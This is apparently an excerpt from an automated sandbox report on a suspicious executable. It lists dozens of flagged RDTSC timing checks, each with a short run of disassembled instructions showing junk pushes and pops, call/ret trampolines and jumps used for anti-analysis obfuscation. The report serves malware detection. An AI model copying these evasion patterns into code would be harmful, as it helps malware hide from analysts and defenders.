            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FFF7BF second address: FFF7D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b je 00007FF15854888Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FFF98B second address: FFF997 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF158DB38FEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FFFAF2 second address: FFFB14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF158548898h 0x00000009 jbe 00007FF158548886h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FFFB14 second address: FFFB18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FFFEDA second address: FFFF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FF158548894h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FFFF00 second address: FFFF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10001A1 second address: 10001AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF158548886h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10001AB second address: 10001C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3902h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF158DB3902h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1000308 second address: 100030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100030C second address: 100032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF158DB3907h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FD4DF7 second address: FD4E17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF158548890h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FF158548886h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FD4E17 second address: FD4E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1000BE3 second address: 1000BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF15854888Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1000BF4 second address: 1000BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1000BF9 second address: 1000BFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1001072 second address: 1001077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FC92D3 second address: FC92F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548892h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FF15854888Ah 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1008F59 second address: 1008F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1007800 second address: 1007804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100CA2E second address: 100CA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100CA32 second address: 100CA3E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100CA3E second address: 100CA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100CA42 second address: 100CA46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100CFB3 second address: 100CFBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100D2A1 second address: 100D2C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548892h 0x00000007 jnl 00007FF158548886h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100E37A second address: 100E393 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF158DB38F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FF158DB38F8h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100E393 second address: 100E399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100E602 second address: 100E63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF158DB3908h 0x00000009 popad 0x0000000a jmp 00007FF158DB3904h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FF158DB38F6h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100E63E second address: 100E642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100E70D second address: 100E711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100E711 second address: 100E715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100EA6A second address: 100EA74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF158DB38F6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100EF20 second address: 100EF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100EF24 second address: 100EF28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100F0B5 second address: 100F0CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FF15854888Ch 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100F0CA second address: 100F0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100F36E second address: 100F374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 100F374 second address: 100F379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101045E second address: 10104C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FF158548886h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FF158548898h 0x00000014 nop 0x00000015 jmp 00007FF158548891h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FF158548888h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 push 00000000h 0x00000038 mov esi, dword ptr [ebp+122D2CECh] 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 pushad 0x00000043 popad 0x00000044 pop ecx 0x00000045 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1010C7E second address: 1010C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1011EB7 second address: 1011EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1012999 second address: 10129A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF158DB38F6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10129A3 second address: 10129FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b or dword ptr [ebp+122D2EADh], ebx 0x00000011 push 00000000h 0x00000013 movzx esi, ax 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FF158548888h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 jmp 00007FF158548890h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FF15854888Ah 0x0000003f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10129FD second address: 1012A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF158DB38F6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10131DE second address: 10131F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF158548893h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10149CF second address: 1014A43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB38FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FF158DB38F8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov si, 332Dh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FF158DB38F8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 mov esi, eax 0x00000047 push 00000000h 0x00000049 clc 0x0000004a xchg eax, ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e jmp 00007FF158DB3903h 0x00000053 pop eax 0x00000054 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1014A43 second address: 1014A48 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10176F1 second address: 10176F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10147A6 second address: 10147B0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF15854888Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1017C98 second address: 1017C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1017C9D second address: 1017CA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FF158548886h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1017CA8 second address: 1017CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FF158DB38FCh 0x0000000f jnl 00007FF158DB38F6h 0x00000015 popad 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1018EDC second address: 1018EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101BEE1 second address: 101BEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101B045 second address: 101B063 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548890h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FF158548886h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101B063 second address: 101B067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101CE15 second address: 101CE28 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF158548886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FF158548886h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101C034 second address: 101C038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101CE28 second address: 101CE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 cld 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FF158548888h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov edi, 54D955E5h 0x0000002d jmp 00007FF15854888Bh 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push esi 0x00000038 pop esi 0x00000039 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101C038 second address: 101C0C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FF158DB38F8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D2846h], ecx 0x00000027 push dword ptr fs:[00000000h] 0x0000002e add dword ptr [ebp+122D2DAEh], edx 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov ebx, dword ptr [ebp+122D2AE0h] 0x00000041 mov eax, dword ptr [ebp+122D153Dh] 0x00000047 mov edi, ecx 0x00000049 push FFFFFFFFh 0x0000004b call 00007FF158DB3902h 0x00000050 or dword ptr [ebp+122D183Bh], ecx 0x00000056 pop ebx 0x00000057 nop 0x00000058 jg 00007FF158DB3902h 0x0000005e jp 00007FF158DB38FCh 0x00000064 jg 00007FF158DB38F6h 0x0000006a push eax 0x0000006b pushad 0x0000006c jng 00007FF158DB38FCh 0x00000072 push esi 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101CE6F second address: 101CE79 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF158548886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101DE6A second address: 101DE7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF158DB3901h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101CFDF second address: 101CFE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101CFE5 second address: 101CFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 101CFE9 second address: 101CFFB instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF158548886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1020F3B second address: 1020F45 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF158DB38FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1023115 second address: 102311F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1025038 second address: 102503C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 102428C second address: 1024292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 102503C second address: 1025055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB38FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FF158DB38F6h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1025055 second address: 10250E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FF158548888h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 jmp 00007FF15854888Eh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007FF158548888h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 push eax 0x00000046 call 00007FF15854888Fh 0x0000004b and edi, dword ptr [ebp+122D2AB8h] 0x00000051 pop ebx 0x00000052 pop ebx 0x00000053 push 00000000h 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 jg 00007FF15854888Ch 0x0000005d jg 00007FF158548886h 0x00000063 pop eax 0x00000064 push eax 0x00000065 push ecx 0x00000066 jl 00007FF15854888Ch 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1027179 second address: 102717D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1025237 second address: 102523C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 102523C second address: 1025259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF158DB3903h 0x00000010 jmp 00007FF158DB38FDh 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1025259 second address: 1025307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548891h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FF15854888Eh 0x0000000f jmp 00007FF158548896h 0x00000014 push dword ptr fs:[00000000h] 0x0000001b jc 00007FF1585488A0h 0x00000021 call 00007FF158548893h 0x00000026 sub dword ptr [ebp+122D3366h], edi 0x0000002c pop ebx 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007FF158548888h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+1247DC54h] 0x00000054 mov eax, dword ptr [ebp+122D1439h] 0x0000005a mov di, cx 0x0000005d push FFFFFFFFh 0x0000005f mov dword ptr [ebp+122D192Fh], edx 0x00000065 nop 0x00000066 push eax 0x00000067 je 00007FF158548888h 0x0000006d push eax 0x0000006e pop eax 0x0000006f pop eax 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1025307 second address: 1025312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF158DB38F6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1027892 second address: 10278A7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF158548886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10285A6 second address: 10285AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10278A7 second address: 10278AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 102ABB6 second address: 102ABBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
